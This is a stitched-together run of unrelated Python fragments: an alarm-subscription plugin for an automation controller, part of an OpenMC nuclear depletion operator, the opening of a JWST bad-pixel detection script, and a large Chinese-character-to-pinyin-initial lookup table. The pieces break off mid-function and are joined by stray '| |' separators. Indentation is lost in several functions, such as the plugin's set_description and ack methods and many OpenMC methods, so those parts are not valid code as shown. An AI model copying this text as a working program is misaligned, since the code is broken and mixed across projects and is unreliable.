    """Create the plugin's DB tables (alarmer_sub, alarmer_log) if missing.

    Table creation is idempotent (SQLAlchemy ``create_all``); errors are
    logged but not fatal.
    """
    dbconn = get_db()
    meta = sa.MetaData()
    # subscriptions: one row per (user, user-type, alarm) with the minimum
    # level the user wants to be notified about
    sa.Table(
        'alarmer_sub', meta, sa.Column('u', sa.String(128), primary_key=True),
        sa.Column('utp', sa.String(32), primary_key=True),
        sa.Column('alarm_id', sa.String(256), primary_key=True),
        sa.Column('level', sa.Integer()))
    # event log: records written by notify() (action 'T' = triggered)
    sa.Table(
        'alarmer_log', meta, sa.Column('u', sa.String(128), primary_key=True),
        sa.Column('utp', sa.String(32), primary_key=True),
        sa.Column('key_id', sa.String(64), primary_key=True),
        sa.Column('alarm_id', sa.String(256), primary_key=True),
        sa.Column('description', sa.String(256), primary_key=True),
        sa.Column('action', sa.String(1), primary_key=True),
        sa.Column('t', sa.Float(), primary_key=True),
        sa.Column('level', sa.Integer(), primary_key=True))
    try:
        meta.create_all(dbconn)
    except Exception:
        pa.log_traceback()
        # fixed typo in the original message ("alarme")
        logger.error('unable to create alarmer tables in db')
def start(**kwargs):
    """Launch the log-cleaner background worker (LM product only)."""
    if pa.get_product().code != 'lm':
        return
    log_cleaner.start()
def stop(**kwargs):
    """Stop the log-cleaner background worker (LM product only)."""
    if pa.get_product().code != 'lm':
        return
    log_cleaner.stop()
class APIFuncs(pa.APIX):
"""
ACL:
- to receive alarm events in UI, user must have r/o access to alarm
lvar
- to disable/enable/acknowledge user must have rw access to alarm lvar
- to create / edit / destroy alarms master key is required
If alarm lvar has status = 0, the plugin considers the alarm as disabled
"""
    @pa.api_log_i
    def subscribe(self, **kwargs):
        """Subscribe the logged-in user to an alarm.

        kwargs: k = API key, i = alarm id, l = minimum level (1 or 2).
        Requires read-only access to the alarm lvar.  Acts as an upsert:
        if a subscription row already exists, only its level is updated.
        """
        k, i, l = pa.parse_function_params(kwargs, 'kil', 'SSI')
        lvar = pa.get_item(f'lvar:alarmer/{i}')
        if l < 1 or l > 2:
            raise pa.InvalidParameter('param "l" should be 1 or 2')
        if not lvar:
            raise pa.ResourceNotFound
        if not pa.key_check(k, lvar, ro_op=True):
            raise pa.AccessDenied
        db = get_db()
        u = pa.get_aci('u')
        if not u:
            raise pa.FunctionFailed('user is not logged in')
        utp = pa.get_aci('utp')
        if not utp:
            utp = ''
        kw = {'u': u, 'utp': utp, 'alarm_id': i, 'level': l}
        if db.execute(
                sql('select alarm_id from alarmer_sub where u=:u '
                    'and utp=:utp and alarm_id=:alarm_id'), **kw).fetchone():
            db.execute(
                sql('update alarmer_sub set level=:level '
                    'where u=:u and utp=:utp and alarm_id=:alarm_id'), **kw)
        else:
            db.execute(
                sql('insert into alarmer_sub(u, utp, alarm_id, level) '
                    'values (:u, :utp, :alarm_id, :level)'), **kw)
        return True
    @pa.api_log_i
    def unsubscribe(self, **kwargs):
        """Remove the logged-in user's subscription to an alarm.

        kwargs: k = API key, i = alarm id.  Requires read-only access to
        the alarm lvar.  Deleting a non-existent subscription is not an
        error.
        """
        k, i = pa.parse_function_params(kwargs, 'ki', 'SS')
        lvar = pa.get_item(f'lvar:alarmer/{i}')
        if not lvar:
            raise pa.ResourceNotFound
        if not pa.key_check(k, lvar, ro_op=True):
            raise pa.AccessDenied
        db = get_db()
        u = pa.get_aci('u')
        if not u:
            raise pa.FunctionFailed('user is not logged in')
        utp = pa.get_aci('utp')
        if not utp:
            utp = ''
        kw = {'u': u, 'utp': utp, 'alarm_id': i}
        db.execute(
            sql('delete from alarmer_sub where u=:u '
                'and utp=:utp and alarm_id=:alarm_id'), **kw)
        return True
    @pa.api_log_i
    def list_subscriptions(self, **kwargs):
        """Return the logged-in user's subscriptions.

        :returns: list of dicts {'alarm_id': ..., 'level': ...}
        """
        u = pa.get_aci('u')
        if not u:
            raise pa.FunctionFailed('user is not logged in')
        utp = pa.get_aci('utp')
        if not utp:
            utp = ''
        kw = {'u': u, 'utp': utp}
        db = get_db()
        return [
            dict(x) for x in db.execute(
                sql('select alarm_id, level '
                    'from alarmer_sub where u=:u and utp=:utp'), **kw)
        ]
    @pa.api_log_i
    @pa.api_need_master
    def create(self, **kwargs):
        """Create an alarm on the connected LM PLC (SFA side, master key).

        Creates the alarm lvar plus two decision rules invoking the
        x_alarmer_notify macro: "<id>_w" (level 1, props from *w*) and
        "<id>_a" (level 2, props from *a*).  Params: u = alarm id (random
        uuid if omitted), d = description, g = group, w / a = rule match
        props, save.  On any failure the partially-created objects are
        rolled back via destroy_alarm (defined elsewhere in this module
        -- TODO confirm) and the error is re-raised.

        :returns: dict {'id': <full alarm id>, 'lvar_id': <lvar oid>}
        """
        u, d, g, rw, ra, save = pa.parse_api_params(kwargs, 'udgwaS', 'sssRRb')
        import uuid
        alarm_id = u if u else str(uuid.uuid4())
        alarm_full_id = f'{g if g else ""}{"/" if g else ""}{alarm_id}'
        lvar_id = f'alarmer{"/" if g else ""}{g if g else ""}/{alarm_id}'
        try:
            # 1. the lvar holding the alarm state
            result = pa.api_call('management_api_call',
                                 i=flags.lm,
                                 f='create_lvar',
                                 p={
                                     'i': lvar_id,
                                     'save': save and not d
                                 })
            if result['code'] != apiclient.result_ok:
                raise pa.FunctionFailed(f'unable to create lvar {lvar_id} at'
                                        f' {flags.lm} ({result["code"]})')
            if d:
                result = pa.api_call('management_api_call',
                                     i=flags.lm,
                                     f='set_prop',
                                     p={
                                         'i': lvar_id,
                                         'p': 'description',
                                         'v': d,
                                         'save': save
                                     })
                if result['code'] != apiclient.result_ok:
                    raise pa.FunctionFailed(
                        f'unable to set lvar description {lvar_id} at '
                        f'{flags.lm} ({result["code"]})')
            # 2. the warning (level 1) rule
            result = pa.api_call('management_api_call',
                                 i=flags.lm,
                                 f='create_rule',
                                 p={
                                     'u': f'{alarm_id}_w',
                                     'v': rw
                                 })
            if result['code'] != apiclient.result_ok:
                raise pa.FunctionFailed(
                    f'unable to create warning rule {alarm_id}w at '
                    f'{flags.lm} ({result["code"]})')
            result = pa.api_call('management_api_call',
                                 i=flags.lm,
                                 f='set_rule_prop',
                                 p={
                                     'i': f'{alarm_id}_w',
                                     'v': {
                                         'description': d,
                                         'macro': '@x_alarmer_notify',
                                         'macro_args': [alarm_full_id, 1],
                                         'priority': 1,
                                         'enabled': True
                                     },
                                     'save': save
                                 })
            if result['code'] != apiclient.result_ok:
                raise pa.FunctionFailed(
                    f'unable to set warning rule {alarm_id}_w props '
                    f'at {flags.lm} ({result["code"]})')
            # 3. the alarm (level 2) rule
            result = pa.api_call('management_api_call',
                                 i=flags.lm,
                                 f='create_rule',
                                 p={
                                     'u': f'{alarm_id}_a',
                                     'v': ra
                                 })
            if result['code'] != apiclient.result_ok:
                raise pa.FunctionFailed(
                    f'unable to create alarm rule {alarm_id}w at '
                    f'{flags.lm} ({result["code"]})')
            result = pa.api_call('management_api_call',
                                 i=flags.lm,
                                 f='set_rule_prop',
                                 p={
                                     'i': f'{alarm_id}_a',
                                     'v': {
                                         'description': d,
                                         'macro': '@x_alarmer_notify',
                                         'macro_args': [alarm_full_id, 2],
                                         'priority': 1,
                                         'enabled': True
                                     },
                                     'save': save
                                 })
            if result['code'] != apiclient.result_ok:
                raise pa.FunctionFailed(
                    f'unable to set alarm rule {alarm_id}_a props '
                    f'at {flags.lm} ({result["code"]})')
            pa.api_call('reload_controller', i=flags.lm)
        except:
            pa.log_traceback()
            # roll back everything created so far, then re-raise
            destroy_alarm(f'{g if g else ""}{"/" if g else ""}{alarm_id}')
            raise
        return {'id': alarm_full_id, 'lvar_id': lvar_id}
@pa.api_log_i
@pa.api_need_master
def set_description(self, **kwargs):
i, d, save = pa.parse_api_params(kwargs, 'idS', 'Ssb')
lvar_id = f'lvar:alarmer/{i}'
rule_id = i.rsplit('/')[-1]
result = pa.api_call('management_api_call',
i=flags.lm,
f='set_prop',
p={
'i': lvar_id,
'p': 'description',
'v': d,
'save': save
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to set lvar description {lvar_id} at '
f'{flags.lm} ({result["code"]})')
for rtp in ['w', 'a']:
result = pa.api_call('management_api_call',
i=flags.lm,
f='set_rule_prop',
p={
'i': f'{rule_id}_{rtp}',
'p': 'description',
'v': d,
'save': save
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to set rule description {rule_id}_{rtp} at '
f'{flags.lm} ({result["code"]})')
pa.api_call('reload_controller', i=flags.lm)
return True
@pa.api_log_i
@pa.api_need_master
def set_rule_props(self, **kwargs):
i, rw, ra, save = pa.parse_api_params(kwargs, 'iwaS', 'S..b')
rule_id = i.rsplit('/')[-1]
if rw:
result = pa.api_call('management_api_call',
i=flags.lm,
f='set_rule_prop',
p={
'i': f'{rule_id}_w',
'v': rw,
'save': save
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to set warning rule props {rule_id}_w at '
f'{flags.lm} ({result["code"]})')
if ra:
result = pa.api_call('management_api_call',
i=flags.lm,
f='set_rule_prop',
p={
'i': f'{rule_id}_a',
'v': ra,
'save': save
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to set alarm rule props {rule_id}_a at '
f'{flags.lm} ({result["code"]})')
return True
@pa.api_log_i
@pa.api_need_master
def list_rule_props(self, **kwargs):
i = pa.parse_api_params(kwargs, 'i', 'S')
rules = {}
rule_id = i.rsplit('/')[-1]
for rtp in ['w', 'a']:
result = pa.api_call('management_api_call',
i=flags.lm,
f='list_rule_props',
p={
'i': f'{rule_id}_{rtp}',
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to list rule props {rule_id}_{rtp} at '
f'{flags.lm} ({result["code"]})')
d = result['data']
for x in [
'enabled', 'macro', 'macro_args', 'macro_kwargs', 'priority'
]:
try:
del d[x]
except KeyError:
pass
rules['r' + rtp] = d
return rules
    @pa.api_log_w
    @pa.api_need_master
    def destroy(self, **kwargs):
        """Destroy an alarm (API param ``i``: alarm id) via destroy_alarm()."""
        i = pa.parse_api_params(kwargs, 'i', 'S')
        return destroy_alarm(i)
@pa.api_log_i
def ack(self, **kwargs):
k, i = pa.parse_function_params(kwargs, 'ki', 'SS')
lvar = pa.get_item(f'lvar:alarmer/{i}')
if not lvar:
raise pa.ResourceNotFound
if not pa.key_check(k, lvar):
raise pa.AccessDenied
lv | |
Total atoms to be used in function.
source_rate : float
Power in [W] or source rate in [neutron/sec]
Returns
-------
openmc.deplete.OperatorResult
Eigenvalue and reaction rates resulting from transport operator
"""
# Reset results in OpenMC
openmc.lib.reset()
# Update the number densities regardless of the source rate
self.number.set_density(vec)
self._update_materials()
# If the source rate is zero, return zero reaction rates without running
# a transport solve
if source_rate == 0.0:
rates = self.reaction_rates.copy()
rates.fill(0.0)
return OperatorResult(ufloat(0.0, 0.0), rates)
# Prevent OpenMC from complaining about re-creating tallies
openmc.reset_auto_ids()
# Update tally nuclides data in preparation for transport solve
nuclides = self._get_tally_nuclides()
self._rate_helper.nuclides = nuclides
self._normalization_helper.nuclides = nuclides
self._yield_helper.update_tally_nuclides(nuclides)
# Run OpenMC
openmc.lib.run()
openmc.lib.reset_timers()
# Extract results
op_result = self._unpack_tallies_and_normalize(source_rate)
return copy.deepcopy(op_result)
@staticmethod
def write_bos_data(step):
"""Write a state-point file with beginning of step data
Parameters
----------
step : int
Current depletion step including restarts
"""
openmc.lib.statepoint_write(
"openmc_simulation_n{}.h5".format(step),
write_source=False)
def _differentiate_burnable_mats(self):
"""Assign distribmats for each burnable material
"""
# Count the number of instances for each cell and material
self.geometry.determine_paths(instances_only=True)
# Extract all burnable materials which have multiple instances
distribmats = set(
[mat for mat in self.geometry.get_all_materials().values()
if mat.depletable and mat.num_instances > 1])
for mat in distribmats:
if mat.volume is None:
raise RuntimeError("Volume not specified for depletable "
"material with ID={}.".format(mat.id))
mat.volume /= mat.num_instances
if distribmats:
# Assign distribmats to cells
for cell in self.geometry.get_all_material_cells().values():
if cell.fill in distribmats:
mat = cell.fill
cell.fill = [mat.clone()
for i in range(cell.num_instances)]
def _get_burnable_mats(self):
"""Determine depletable materials, volumes, and nuclides
Returns
-------
burnable_mats : list of str
List of burnable material IDs
volume : OrderedDict of str to float
Volume of each material in [cm^3]
nuclides : list of str
Nuclides in order of how they'll appear in the simulation.
"""
burnable_mats = set()
model_nuclides = set()
volume = OrderedDict()
self.heavy_metal = 0.0
# Iterate once through the geometry to get dictionaries
for mat in self.geometry.get_all_materials().values():
for nuclide in mat.get_nuclides():
model_nuclides.add(nuclide)
if mat.depletable:
burnable_mats.add(str(mat.id))
if mat.volume is None:
raise RuntimeError("Volume not specified for depletable "
"material with ID={}.".format(mat.id))
volume[str(mat.id)] = mat.volume
self.heavy_metal += mat.fissionable_mass
# Make sure there are burnable materials
if not burnable_mats:
raise RuntimeError(
"No depletable materials were found in the model.")
# Sort the sets
burnable_mats = sorted(burnable_mats, key=int)
model_nuclides = sorted(model_nuclides)
# Construct a global nuclide dictionary, burned first
nuclides = list(self.chain.nuclide_dict)
for nuc in model_nuclides:
if nuc not in nuclides:
nuclides.append(nuc)
return burnable_mats, volume, nuclides
    def _extract_number(self, local_mats, volume, nuclides, prev_res=None):
        """Construct AtomNumber using geometry

        Parameters
        ----------
        local_mats : list of str
            Material IDs to be managed by this process
        volume : OrderedDict of str to float
            Volumes for the above materials in [cm^3]
        nuclides : list of str
            Nuclides to be used in the simulation.
        prev_res : ResultsList, optional
            Results from a previous depletion calculation
        """
        self.number = AtomNumber(local_mats, nuclides, volume, len(self.chain))
        # Optionally give every burnable nuclide a small nonzero density in
        # all materials (np.s_[:] selects every material slot)
        if self.dilute_initial != 0.0:
            for nuc in self._burnable_nucs:
                self.number.set_atom_density(np.s_[:], nuc, self.dilute_initial)
        # Now extract and store the number densities
        # From the geometry if no previous depletion results
        if prev_res is None:
            for mat in self.geometry.get_all_materials().values():
                if str(mat.id) in local_mats:
                    self._set_number_from_mat(mat)
        # Else from previous depletion results
        else:
            for mat in self.geometry.get_all_materials().values():
                if str(mat.id) in local_mats:
                    self._set_number_from_results(mat, prev_res)
def _set_number_from_mat(self, mat):
"""Extracts material and number densities from openmc.Material
Parameters
----------
mat : openmc.Material
The material to read from
"""
mat_id = str(mat.id)
for nuclide, density in mat.get_nuclide_atom_densities().values():
number = density * 1.0e24
self.number.set_atom_density(mat_id, nuclide, number)
    def _set_number_from_results(self, mat, prev_res):
        """Extracts material nuclides and number densities.

        If the nuclide concentration's evolution is tracked, the densities come
        from depletion results. Else, densities are extracted from the geometry
        in the summary.

        Parameters
        ----------
        mat : openmc.Material
            The material to read from
        prev_res : ResultsList
            Results from a previous depletion calculation
        """
        mat_id = str(mat.id)
        # Get nuclide lists from geometry and depletion results
        depl_nuc = prev_res[-1].nuc_to_ind
        geom_nuc_densities = mat.get_nuclide_atom_densities()
        # Merge lists of nuclides, with the same order for every calculation.
        # NOTE(review): update() clobbers the geometry entries for tracked
        # nuclides with chain indices — only the KEYS matter for those; the
        # stored values are read only in the "else" branch below.
        geom_nuc_densities.update(depl_nuc)
        for nuclide in geom_nuc_densities.keys():
            if nuclide in depl_nuc:
                # Tracked nuclide: final atom count from previous results
                # divided by the material volume
                concentration = prev_res.get_atoms(mat_id, nuclide)[1][-1]
                volume = prev_res[-1].volume[mat_id]
                number = concentration / volume
            else:
                # Untracked nuclide: geometry density scaled by 1.0e24
                # (presumably [atom/b-cm] -> [atom/cm^3] — confirm)
                density = geom_nuc_densities[nuclide][1]
                number = density * 1.0e24
            self.number.set_atom_density(mat_id, nuclide, number)
    def initial_condition(self):
        """Performs final setup and returns initial condition.

        Writes the model XML files (rank 0 only), initializes the OpenMC
        C API library, and creates the tallies needed for reaction rates,
        normalization and fission yields.

        Returns
        -------
        list of numpy.ndarray
            Total density for initial conditions.
        """
        # Create XML files; only rank 0 writes so ranks don't clobber
        # each other's output
        if comm.rank == 0:
            self.geometry.export_to_xml()
            self.settings.export_to_xml()
            self._generate_materials_xml()
        # Initialize OpenMC library; the barrier ensures the XML files
        # exist on disk before any rank initializes from them
        comm.barrier()
        if not openmc.lib.is_initialized:
            openmc.lib.init(intracomm=comm)
        # Generate tallies in memory for all depletable materials
        materials = [openmc.lib.materials[int(i)]
                     for i in self.burnable_mats]
        self._rate_helper.generate_tallies(materials, self.chain.reactions)
        self._normalization_helper.prepare(
            self.chain.nuclides, self.reaction_rates.index_nuc)
        # Tell fission yield helper what materials this process is
        # responsible for
        self._yield_helper.generate_tallies(
            materials, tuple(sorted(self._mat_index_map.values())))
        # Return number density vector
        return list(self.number.get_mat_slice(np.s_[:]))
def finalize(self):
"""Finalize a depletion simulation and release resources."""
if self.cleanup_when_done:
openmc.lib.finalize()
    def _update_materials(self):
        """Updates material compositions in OpenMC on all processes."""
        # Each rank takes a turn broadcasting its AtomNumber so every
        # process can push densities for every material into openmc.lib
        for rank in range(comm.size):
            number_i = comm.bcast(self.number, root=rank)
            for mat in number_i.materials:
                nuclides = []
                densities = []
                for nuc in number_i.nuclides:
                    # only nuclides with cross-section data can be given
                    # to the transport solver
                    if nuc in self.nuclides_with_data:
                        # convert to [atom/b-cm] (see warning text below)
                        val = 1.0e-24 * number_i.get_atom_density(mat, nuc)
                        # If nuclide is zero, do not add to the problem.
                        if val > 0.0:
                            if self.round_number:
                                # keep 8 significant figures for
                                # reproducible transport input
                                val_magnitude = np.floor(np.log10(val))
                                val_scaled = val / 10**val_magnitude
                                val_round = round(val_scaled, 8)
                                val = val_round * 10**val_magnitude
                            nuclides.append(nuc)
                            densities.append(val)
                        else:
                            # Only output warnings if values are significantly
                            # negative. CRAM does not guarantee positive values.
                            if val < -1.0e-21:
                                print("WARNING: nuclide ", nuc, " in material ", mat,
                                      " is negative (density = ", val, " at/barn-cm)")
                            # clamp negative/zero densities to zero
                            number_i[mat, nuc] = 0.0
                # Update densities on C API side
                mat_internal = openmc.lib.materials[int(mat)]
                mat_internal.set_densities(nuclides, densities)
                #TODO Update densities on the Python side, otherwise the
                # summary.h5 file contains densities at the first time step
def _generate_materials_xml(self):
"""Creates materials.xml from self.number.
Due to uncertainty with how MPI interacts with OpenMC API, this
constructs the XML manually. The long term goal is to do this
through direct memory writing.
"""
materials = openmc.Materials(self.geometry.get_all_materials()
.values())
# Sort nuclides according to order in AtomNumber object
nuclides = list(self.number.nuclides)
for mat in materials:
mat._nuclides.sort(key=lambda x: nuclides.index(x[0]))
# Grab the cross sections tag from the existing file
mfile = Path("materials.xml")
if mfile.exists():
tree = ET.parse(str(mfile))
xs = tree.find('cross_sections')
if xs is not None:
materials.cross_sections = xs.text
materials.export_to_xml()
    def _get_tally_nuclides(self):
        """Determine nuclides that should be tallied for reaction rates.

        This method returns a list of all nuclides that have neutron data and
        are listed in the depletion chain. Technically, we should tally nuclides
        that may not appear in the depletion chain because we still need to get
        the fission reaction rate for these nuclides in order to normalize
        power, but that is left as a future exercise.

        Returns
        -------
        list of str
            Tally nuclides
        """
        nuc_set = set()
        # Create the set of all nuclides in the decay chain in materials marked
        # for burning in which the number density is greater than zero.
        for nuc in self.number.nuclides:
            if nuc in self.nuclides_with_data:
                if np.sum(self.number[:, nuc]) > 0.0:
                    nuc_set.add(nuc)
        # Communicate which nuclides have nonzeros to rank 0
        if comm.rank == 0:
            # union of every other rank's set (matched by tag == sender rank)
            for i in range(1, comm.size):
                nuc_newset = comm.recv(source=i, tag=i)
                nuc_set |= nuc_newset
        else:
            comm.send(nuc_set, dest=0, tag=comm.rank)
        if comm.rank == 0:
            # Sort nuclides in the same order as self.number
            nuc_list = [nuc for nuc in self.number.nuclides
                        if nuc in nuc_set]
        else:
            nuc_list = None
        # Store list of tally nuclides on each process
        nuc_list = comm.bcast(nuc_list)
        # Keep only nuclides that appear in the depletion chain
        return [nuc for nuc in nuc_list if nuc in self.chain]
def _unpack_tallies_and_normalize(self, source_rate):
"""Unpack tallies from OpenMC and return an operator result
This method uses OpenMC's C API bindings to determine the k-effective
value and reaction rates from the simulation. The reaction rates are
normalized by a helper class depending on the method being used.
Parameters
----------
source_rate : float
Power in [W] or source rate in [neutron/sec]
Returns
-------
openmc.deplete.OperatorResult
Eigenvalue and reaction rates resulting from transport operator
"""
rates = self.reaction_rates
rates.fill(0.0)
# Get k and | |
#! /usr/bin/env python
"""Find bad pixels from dark current files
Start with a stack of dark ramps and slope images?
Or maybe a stack of ramps that have been processed through the jump step
and then ramp-fitting is performed here?
Input for the dark current reference file step is going to be a stack
of ramps. So maybe use that and ramp-fit here.
inputs:
1. list of dark current ramps that have been run through jump step
2. list of same exposures after ramp-fitting has been done
Plot summary:
0. Check to see if IPC correction has been run
1. Look through stack of slopes images, get mean and rms per pixel
(do we sigma-clip the inputs or not?)
2. Potential bad pixels are those with noise values above some threshold
NOTE: when producing slope images of these data, make sure to save the
optional output parameters into the *fitopt.fits files.
https://jwst-pipeline.readthedocs.io/en/stable/jwst/ramp_fitting/main.html?highlight=intercept
"A third, optional output product is also available and is produced only when the step parameter ‘save_opt’ is True"
"""
from astropy.io import fits
from astropy.stats import sigma_clip
import copy
import os
from jwst.datamodels import dqflags
import numpy as np
from os import path
import matplotlib.pyplot as plt
from scipy.stats import sigmaclip
import matplotlib.cm as cm
from jwst_reffiles.bad_pixel_mask.badpix_from_flats import create_dqdef
from jwst_reffiles.utils import dq_flags
from jwst_reffiles.utils.constants import RATE_FILE_SUFFIXES
def find_bad_pix(filenames, uncal_filenames=None, jump_filenames=None, fitopt_filenames=None,
clipping_sigma=5., max_clipping_iters=5, noisy_threshold=5,
max_saturated_fraction=0.5,
max_jump_limit=10, jump_ratio_threshold=5, early_cutoff_fraction=0.25,
pedestal_sigma_threshold=5, rc_fraction_threshold=0.8, low_pedestal_fraction=0.8,
high_cr_fraction=0.8,
flag_values={'hot': ['HOT'], 'rc': ['RC'], 'low_pedestal': ['OTHER_BAD_PIXEL'], 'high_cr': ["TELEGRAPH"]},
do_not_use=['hot', 'rc', 'low_pedestal', 'high_cr'], outfile=None, plot=False):
"""MAIN FUNCTION
Parameters
----------
filenames : list
List of dark current slope files. These should be slope images.
uncal_filenames : list
List of uncal files. Should have a 1-to-1 correspondence to the
        files in ``filenames``. If None, the script will look in the same
directory containing ``filenames``, and assume that the only
difference in filename is that rate.fits is replaced with
uncal.fits. Uncal files are only used when working with MIRI
data.
jump_filenames : list
List of exposures output from the jump step of the pipeline.
Should have a 1-to-1 correspondence to the
        files in ``filenames``. If None, the script will look in the same
directory containing ``filenames``, and assume that the only
difference in filename is that rate.fits is replaced with
jump.fits
fitopt_filenames : list
List of exposures from the optional output from the ramp_fitting
step of the pipeline. Should have a 1-to-1 correspondence to the
        files in ``filenames``. If None, the script will look in the same
directory containing ``filenames``, and assume that the only
difference in filename is that rate.fits is replaced with
fitopt.fits
clipping_sigma : int
Number of sigma to use when sigma-clipping the 2D array of
standard deviation values from the dark current slope files.
The sigma-clipped mean and standard deviation are used to locate
noisy pixels.
max_clipping_iters : int
Maximum number of iterations to use when sigma clipping to find
the mean and standard deviation values that are used when
locating noisy pixels.
noisy_threshold : int
Number of sigma above the mean noise (associated with the slope)
to use as a threshold for identifying noisy pixels.
max_saturated_fraction : float
When identifying pixels that are fully saturated (in all groups
of an integration), this is the fraction of integrations within
which a pixel must be fully saturated before flagging it as HOT
max_jump_limit : int
The maximum number of jumps a pixel can have in an integration
before it is flagged as a ``high jump`` pixel (which may be
flagged as noisy later)
jump_ratio_threshold : int
Cutoff for the ratio of jumps early in the ramp to jumps later in
the ramp. Pixels with a ratio greater than this value (and which
also have a high total number of jumps) will be flagged as
potential (I)RC pixels.
early_cutoff_fraction : float
Fraction of the integration to use when comparing the jump rate
early in the integration to that across the entire integration.
Must be <= 0.5
pedestal_sigma_threshold : int
Used when searching for RC pixels via the pedestal image. Pixels
with pedestal values more than ``pedestal_sigma_threshold`` above
the mean are flagged as potential RC pixels
rc_fraction_threshold : float
Used when searching for RC pixels. This is the fraction of input
files within which the pixel must be identified as an RC pixel
before it will be flagged as a permanent RC pixel
low_pedestal_fraction : float
This is the fraction of input files within which a pixel must be
identified as a low pedestal pixel before it will be flagged as
a permanent low pedestal pixel
high_cr_fraction : float
This is the fraction of input files within which a pixel must be
flagged as having a high number of jumps before it will be flagged
as permanently noisy
flag_values : dict
This dictionary maps the types of bad pixels searched for to the
flag mnemonics to use when creating the bad pixel file. Keys are
the types of bad pixels searched for, and values are lists that
include mnemonics recognized by the jwst calibration pipeline
e.g. {'hot': ['HOT'], 'rc': ['RC'], 'low_pedestal': ['OTHER_BAD_PIXEL'], 'high_cr': ["TELEGRAPH"]}
do_not_use : list
List of bad pixel types to be flagged as DO_NOT_USE
e.g. ['hot', 'rc', 'low_pedestal', 'high_cr']
plot : bool
If True, produce plots of intermediate results.
outfile : str
Name of fits file to save the resulting bad pixel mask to
"""
# Currently the code stipulates that 5 good values of the slope are
# needed in each pixel in order to determine a good stdev value. So
# let's check the number of input files here and quit if there are
# fewer than 5.
if len(filenames) < 5:
print(filenames)
raise ValueError("ERROR: >5 input files are required to find bad pixels from darks.")
# Add DO_NOT_USE to all requested types of bad pixels
do_not_use = [element.lower() for element in do_not_use]
for key in flag_values:
if key.lower() in do_not_use:
flag_values[key].append('DO_NOT_USE')
# Form the outfile and outdir
if outfile is None:
outfile = 'badpixels_from_darks.fits'
outdir = os.path.dirname(outfile)
if not outdir:
outdir = '.'
# Read in the slope data. Strip off reference pixels.
# Return a 3D array of slopes and a 3D array mapping where the
# science pixels are.
print('Reading slope files...')
# instrument,slopes, refpix_additions = read_slope_files(filenames)
instrument, slopes, indexes, refpix_additions = read_slope_integrations(filenames)
shape_slope = slopes.shape
# Calculate the mean and standard deviation through the stack for
# each pixel. Assuming that we are looking for noisy pixels, we don't
# want to do any sigma clipping on the inputs here, right?
mean_slope = np.mean(slopes, axis=0)
std_slope = np.std(slopes, axis=0)
hdout = fits.PrimaryHDU(mean_slope)
hdout.writeto('average_of_slopes.fits', overwrite=True)
hdout = fits.PrimaryHDU(std_slope)
hdout.writeto('sigma_of_slopes.fits', overwrite=True)
    # Use sigma-clipping when calculating the mean and standard deviation
# of the standard deviations
clipped_stdevs, cliplow, cliphigh = sigma_clip(std_slope, sigma=clipping_sigma,
maxiters=max_clipping_iters,
masked=False, return_bounds=True)
avg_of_std = np.mean(clipped_stdevs)
std_of_std = np.std(clipped_stdevs)
cut_limit = avg_of_std + std_of_std*noisy_threshold
# Identify noisy pixels as those with noise values more than
# noisy_threshold*sigma above the average noise level
# noisy = std_slope > cut_limit # not a good stat we need to remove slopes with cr hits
# Plot histogram to later compare with better std_slope only containing
# slopes with no jumps detected.
if plot:
xhigh = avg_of_std + std_of_std*noisy_threshold
plot_image(std_slope, xhigh, outdir,
"Pixel Standard devations", "pixel_std_withjumps.png")
nbins = 5000
titleplot = 'Histogram of Pixel Slope STD with cosmic ray jumps: Clipped Ave ' + \
'{:6.4f}'.format(avg_of_std) + ' Std ' + '{:6.4f}'.format(std_of_std)
plot_histogram_stats(std_slope, cut_limit, nbins,
outdir, titleplot,
"histo_std_withjumps.png", xaxis_log=True)
# Read in the optional outputs from the ramp-fitting step, so that
# we can look at the y-intercepts and the jump flags
saturated = np.zeros(slopes.shape)
rc_from_pedestal = np.zeros(slopes.shape)
low_pedestal = np.zeros(slopes.shape)
high_cr_rate = np.zeros(slopes.shape)
rc_from_flags = np.zeros(slopes.shape)
slope_stack = []
islope_stack = []
total_ints = 0
counter = 0
for i, filename in enumerate(filenames):
# Read in the ramp and get the data and dq arrays
jump_file = None
if jump_filenames is not None:
jump_file = jump_filenames[i]
else:
for suffix in RATE_FILE_SUFFIXES:
if suffix in | |
[u'z'] ,
u'锚' : [u'm'] ,
u'斥' : [u'c'] ,
u'丨' : [u'g'] ,
u'贪' : [u't'] ,
u'礲' : [u'l'] ,
u'嶵' : [u'z'] ,
u'肷' : [u'q', u'x'] ,
u'兂' : [u'z'] ,
u'㗅' : [u'h'] ,
u'鑄' : [u'z'] ,
u'擏' : [u'q', u'j'] ,
u'䥒' : [u'c', u'j'] ,
u'豔' : [u'y'] ,
u'硜' : [u'k'] ,
u'峟' : [u'y'] ,
u'菡' : [u'h'] ,
u'偬' : [u'z'] ,
u'㓯' : [u'l'] ,
u'靮' : [u'd'] ,
u'柹' : [u's'] ,
u'䡼' : [u'l'] ,
u'轾' : [u'z'] ,
u'箆' : [u'b'] ,
u'䄍' : [u'z', u'd'] ,
u'萏' : [u'd'] ,
u'瀗' : [u'x'] ,
u'厖' : [u'p', u'm'] ,
u'隘' : [u'a', u'e'] ,
u'栧' : [u'y'] ,
u'躨' : [u'k'] ,
u'窰' : [u'y'] ,
u'䀷' : [u'j'] ,
u'蜹' : [u'r'] ,
u'獁' : [u'm'] ,
u'勀' : [u'k'] ,
u'釂' : [u'j'] ,
u'㡇' : [u'j', u'z'] ,
u'歑' : [u'h'] ,
u'䫐' : [u'l'] ,
u'角' : [u'j', u'l', u'g'] ,
u'痚' : [u'x'] ,
u'䍡' : [u'l'] ,
u'虣' : [u'b'] ,
u'牫' : [u'g'] ,
u'淪' : [u'l', u'g'] ,
u'郬' : [u'q'] ,
u'㭱' : [u'h', u'x'] ,
u'䗺' : [u'y'] ,
u'裼' : [u'x', u't'] ,
u'銁' : [u'j'] ,
u'甄' : [u'z', u'j'] ,
u'妇' : [u'f'] ,
u'誑' : [u'k'] ,
u'洔' : [u'z'] ,
u'皙' : [u'x'] ,
u'鸞' : [u'l'] ,
u'溩' : [u'w'] ,
u'㴴' : [u'c'] ,
u'戶' : [u'h'] ,
u'䚹' : [u'p'] ,
u'鍀' : [u'd'] ,
u'婆' : [u'p'] ,
u'㻉' : [u'b'] ,
u'揋' : [u'w'] ,
